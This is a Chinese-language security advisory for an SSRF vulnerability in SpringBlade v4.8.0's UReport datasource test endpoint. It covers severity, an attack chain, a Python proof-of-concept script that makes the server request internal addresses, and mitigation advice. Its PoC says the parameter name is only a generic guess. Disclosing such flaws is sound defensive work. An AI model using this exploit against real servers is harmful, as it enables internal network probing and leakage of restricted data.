CVE-2026-36764 SpringBlade服务端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-36764

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SpringBlade

漏洞概述

SpringBlade v4.8.0版本被发现存在服务端请求伪造（SSRF）安全漏洞。该漏洞源于/ureport/datasource/testConnection端点未对用户输入的URL地址进行严格的过滤与校验。拥有低权限的攻击者可在通过身份认证后，构造恶意的GET请求诱导服务器向内网发起请求，从而扫描内部端口、读取本地文件或访问受限资源，对内网安全构成威胁。

技术细节

该漏洞位于SpringBlade集成的UReport2数据源测试接口中。当系统处理/ureport/datasource/testConnection请求时，会从用户请求中提取数据源连接参数。由于代码缺乏对目标地址的有效性验证和内网IP限制，攻击者可以控制请求指向内部网络地址（如127.0.0.1、内网网段或云元数据服务）。攻击者首先需要获取一个低权限账户登录系统（PR:L），随后无需用户交互（UI:N）即可发送特制数据包。服务器端代为请求目标地址后，将响应结果反馈给攻击者，攻击者据此可探测内网拓扑和服务状态，导致信息泄露（C:L）。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标系统正在使用SpringBlade v4.8.0框架，并确认/ureport/datasource/testConnection接口可访问。

STEP 2

2. 获取凭证

攻击者通过弱口令猜测、社会工程学或其他方式获取一个低权限用户的登录凭证，完成身份认证。

STEP 3

3. 构造恶意请求

攻击者构造一个特制的GET请求，将数据源连接参数中的URL替换为内网敏感地址（如http://127.0.0.1:6379）。

STEP 4

4. 发起SSRF攻击

攻击者向/ureport/datasource/testConnection端点发送恶意请求，服务器后台代为访问内网目标。

STEP 5

5. 分析响应

攻击者根据服务器返回的HTTP响应内容或响应时间差，判断内网端口是否开放或服务是否存在，实现内网扫描。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable SpringBlade instance
target_host = "http://vulnerable-host:80"
endpoint = "/ureport/datasource/testConnection"

# Internal resource to access (e.g., local admin panel or file)
# Example: Scanning internal port 8080 or AWS metadata
internal_target = "http://127.0.0.1:8080"

# Attacker's authenticated session cookie (Required: PR:L)
# Replace 'valid_token' with a real session token obtained after login
cookies = {
    "Blade-Auth": "valid_token"
}

# Malicious payload parameters
# The parameter name might vary based on implementation, 'url' is used as a generic example
payload = {
    "url": internal_target,
    "name": "test",
    "driver": "com.mysql.jdbc.Driver" 
}

try:
    # Sending the crafted GET request
    response = requests.get(target_host + endpoint, params=payload, cookies=cookies, timeout=10)

    if response.status_code == 200:
        print("[+] SSRF Triggered successfully!")
        print("[+] Response from internal resource:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)

except requests.exceptions.RequestException as e:
    print(f"[!] Error occurred: {e}")

影响范围

SpringBlade v4.8.0

防御指南

临时缓解措施

建议立即升级SpringBlade至修复版本。如果暂时无法升级，应通过配置WAF规则拦截针对/ureport/datasource/testConnection接口的请求，或在网络层阻断服务器对内网的非法访问，同时加强账户安全管理，防止低权限账户被滥用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-36764
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-36764
3 Details https://www.cvedetails.com/cve/CVE-2026-36764/
4 VulDB https://vuldb.com/cve/CVE-2026-36764
5 Link https://github.com/chillzhuang/SpringBlade
6 Link https://github.com/chillzhuang/SpringBlade/issues/36
7 Link https://github.com/chillzhuang/SpringBlade/issues/36